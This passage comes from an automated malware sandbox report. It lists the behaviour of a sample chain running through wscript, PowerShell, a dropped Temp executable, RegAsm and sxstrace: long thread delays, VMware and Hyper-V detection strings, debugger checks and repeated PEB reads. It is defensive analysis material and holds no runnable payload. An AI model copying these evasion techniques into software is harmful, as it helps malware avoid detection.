                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3901Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2445Jump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeWindow / User API: threadDelayed 3956Jump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeWindow / User API: threadDelayed 6016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI coverage: 2.9 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6212Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304Thread sleep count: 3956 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304Thread sleep time: -7912000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304Thread sleep count: 6016 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304Thread sleep time: -12032000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe TID: 3196Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sxstrace.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sxstrace.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004FC550 FindFirstFileW,FindNextFileW,FindClose,8_2_004FC550
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: W4ja93oMuuBdSP.exe, 0000000C.00000002.2894141957.0000000001169000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
                Source: wscript.exe, 00000000.00000003.1762205433.0000023838771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ (T
                Source: wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO
                Source: powershell.exe, 00000001.00000002.1757508198.00000240F7179000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000000.00000002.1763354595.0000023838754000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.0000023838754000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000001.00000002.1757508198.00000240F7179000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Use
                Source: powershell.exe, 00000001.00000002.1757508198.00000240F7179000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
                Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000863000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000D.00000002.2147975967.0000022FF9BBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F096E rdtsc 6_2_026F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00417643 LdrLoadDll,6_2_00417643
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A826B mov eax, dword ptr fs:[00000030h]6_2_026A826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760274 mov eax, dword ptr fs:[00000030h]6_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B4260 mov eax, dword ptr fs:[00000030h]6_2_026B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B4260 mov eax, dword ptr fs:[00000030h]6_2_026B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B4260 mov eax, dword ptr fs:[00000030h]6_2_026B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276A250 mov eax, dword ptr fs:[00000030h]6_2_0276A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276A250 mov eax, dword ptr fs:[00000030h]6_2_0276A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02738243 mov eax, dword ptr fs:[00000030h]6_2_02738243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02738243 mov ecx, dword ptr fs:[00000030h]6_2_02738243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6259 mov eax, dword ptr fs:[00000030h]6_2_026B6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AA250 mov eax, dword ptr fs:[00000030h]6_2_026AA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A823B mov eax, dword ptr fs:[00000030h]6_2_026A823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C02E1 mov eax, dword ptr fs:[00000030h]6_2_026C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C02E1 mov eax, dword ptr fs:[00000030h]6_2_026C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C02E1 mov eax, dword ptr fs:[00000030h]6_2_026C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA2C3 mov eax, dword ptr fs:[00000030h]6_2_026BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA2C3 mov eax, dword ptr fs:[00000030h]6_2_026BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA2C3 mov eax, dword ptr fs:[00000030h]6_2_026BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA2C3 mov eax, dword ptr fs:[00000030h]6_2_026BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA2C3 mov eax, dword ptr fs:[00000030h]6_2_026BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C02A0 mov eax, dword ptr fs:[00000030h]6_2_026C02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C02A0 mov eax, dword ptr fs:[00000030h]6_2_026C02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027462A0 mov eax, dword ptr fs:[00000030h]6_2_027462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027462A0 mov ecx, dword ptr fs:[00000030h]6_2_027462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027462A0 mov eax, dword ptr fs:[00000030h]6_2_027462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027462A0 mov eax, dword ptr fs:[00000030h]6_2_027462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027462A0 mov eax, dword ptr fs:[00000030h]6_2_027462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027462A0 mov eax, dword ptr fs:[00000030h]6_2_027462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE284 mov eax, dword ptr fs:[00000030h]6_2_026EE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE284 mov eax, dword ptr fs:[00000030h]6_2_026EE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02730283 mov eax, dword ptr fs:[00000030h]6_2_02730283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02730283 mov eax, dword ptr fs:[00000030h]6_2_02730283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02730283 mov eax, dword ptr fs:[00000030h]6_2_02730283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275437C mov eax, dword ptr fs:[00000030h]6_2_0275437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277A352 mov eax, dword ptr fs:[00000030h]6_2_0277A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02758350 mov ecx, dword ptr fs:[00000030h]6_2_02758350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273035C mov eax, dword ptr fs:[00000030h]6_2_0273035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273035C mov eax, dword ptr fs:[00000030h]6_2_0273035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273035C mov eax, dword ptr fs:[00000030h]6_2_0273035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273035C mov ecx, dword ptr fs:[00000030h]6_2_0273035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273035C mov eax, dword ptr fs:[00000030h]6_2_0273035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273035C mov eax, dword ptr fs:[00000030h]6_2_0273035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02732349 mov eax, dword ptr fs:[00000030h]6_2_02732349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA30B mov eax, dword ptr fs:[00000030h]6_2_026EA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA30B mov eax, dword ptr fs:[00000030h]6_2_026EA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA30B mov eax, dword ptr fs:[00000030h]6_2_026EA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AC310 mov ecx, dword ptr fs:[00000030h]6_2_026AC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D0310 mov ecx, dword ptr fs:[00000030h]6_2_026D0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C03E9 mov eax, dword ptr fs:[00000030h]6_2_026C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E63FF mov eax, dword ptr fs:[00000030h]6_2_026E63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE3F0 mov eax, dword ptr fs:[00000030h]6_2_026CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE3F0 mov eax, dword ptr fs:[00000030h]6_2_026CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE3F0 mov eax, dword ptr fs:[00000030h]6_2_026CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027543D4 mov eax, dword ptr fs:[00000030h]6_2_027543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027543D4 mov eax, dword ptr fs:[00000030h]6_2_027543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA3C0 mov eax, dword ptr fs:[00000030h]6_2_026BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA3C0 mov eax, dword ptr fs:[00000030h]6_2_026BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA3C0 mov eax, dword ptr fs:[00000030h]6_2_026BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA3C0 mov eax, dword ptr fs:[00000030h]6_2_026BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA3C0 mov eax, dword ptr fs:[00000030h]6_2_026BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA3C0 mov eax, dword ptr fs:[00000030h]6_2_026BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B83C0 mov eax, dword ptr fs:[00000030h]6_2_026B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B83C0 mov eax, dword ptr fs:[00000030h]6_2_026B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B83C0 mov eax, dword ptr fs:[00000030h]6_2_026B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B83C0 mov eax, dword ptr fs:[00000030h]6_2_026B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E3DB mov eax, dword ptr fs:[00000030h]6_2_0275E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E3DB mov eax, dword ptr fs:[00000030h]6_2_0275E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E3DB mov ecx, dword ptr fs:[00000030h]6_2_0275E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E3DB mov eax, dword ptr fs:[00000030h]6_2_0275E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027363C0 mov eax, dword ptr fs:[00000030h]6_2_027363C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276C3CD mov eax, dword ptr fs:[00000030h]6_2_0276C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AE388 mov eax, dword ptr fs:[00000030h]6_2_026AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AE388 mov eax, dword ptr fs:[00000030h]6_2_026AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AE388 mov eax, dword ptr fs:[00000030h]6_2_026AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D438F mov eax, dword ptr fs:[00000030h]6_2_026D438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D438F mov eax, dword ptr fs:[00000030h]6_2_026D438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A8397 mov eax, dword ptr fs:[00000030h]6_2_026A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A8397 mov eax, dword ptr fs:[00000030h]6_2_026A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A8397 mov eax, dword ptr fs:[00000030h]6_2_026A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DC073 mov eax, dword ptr fs:[00000030h]6_2_026DC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736050 mov eax, dword ptr fs:[00000030h]6_2_02736050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B2050 mov eax, dword ptr fs:[00000030h]6_2_026B2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746030 mov eax, dword ptr fs:[00000030h]6_2_02746030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AA020 mov eax, dword ptr fs:[00000030h]6_2_026AA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AC020 mov eax, dword ptr fs:[00000030h]6_2_026AC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02734000 mov ecx, dword ptr fs:[00000030h]6_2_02734000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02752000 mov eax, dword ptr fs:[00000030h]6_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE016 mov eax, dword ptr fs:[00000030h]6_2_026CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE016 mov eax, dword ptr fs:[00000030h]6_2_026CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE016 mov eax, dword ptr fs:[00000030h]6_2_026CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE016 mov eax, dword ptr fs:[00000030h]6_2_026CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B80E9 mov eax, dword ptr fs:[00000030h]6_2_026B80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AA0E3 mov ecx, dword ptr fs:[00000030h]6_2_026AA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027360E0 mov eax, dword ptr fs:[00000030h]6_2_027360E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AC0F0 mov eax, dword ptr fs:[00000030h]6_2_026AC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F20F0 mov ecx, dword ptr fs:[00000030h]6_2_026F20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027320DE mov eax, dword ptr fs:[00000030h]6_2_027320DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027760B8 mov eax, dword ptr fs:[00000030h]6_2_027760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027760B8 mov ecx, dword ptr fs:[00000030h]6_2_027760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027480A8 mov eax, dword ptr fs:[00000030h]6_2_027480A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B208A mov eax, dword ptr fs:[00000030h]6_2_026B208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02748158 mov eax, dword ptr fs:[00000030h]6_2_02748158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02744144 mov eax, dword ptr fs:[00000030h]6_2_02744144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02744144 mov eax, dword ptr fs:[00000030h]6_2_02744144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02744144 mov ecx, dword ptr fs:[00000030h]6_2_02744144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02744144 mov eax, dword ptr fs:[00000030h]6_2_02744144
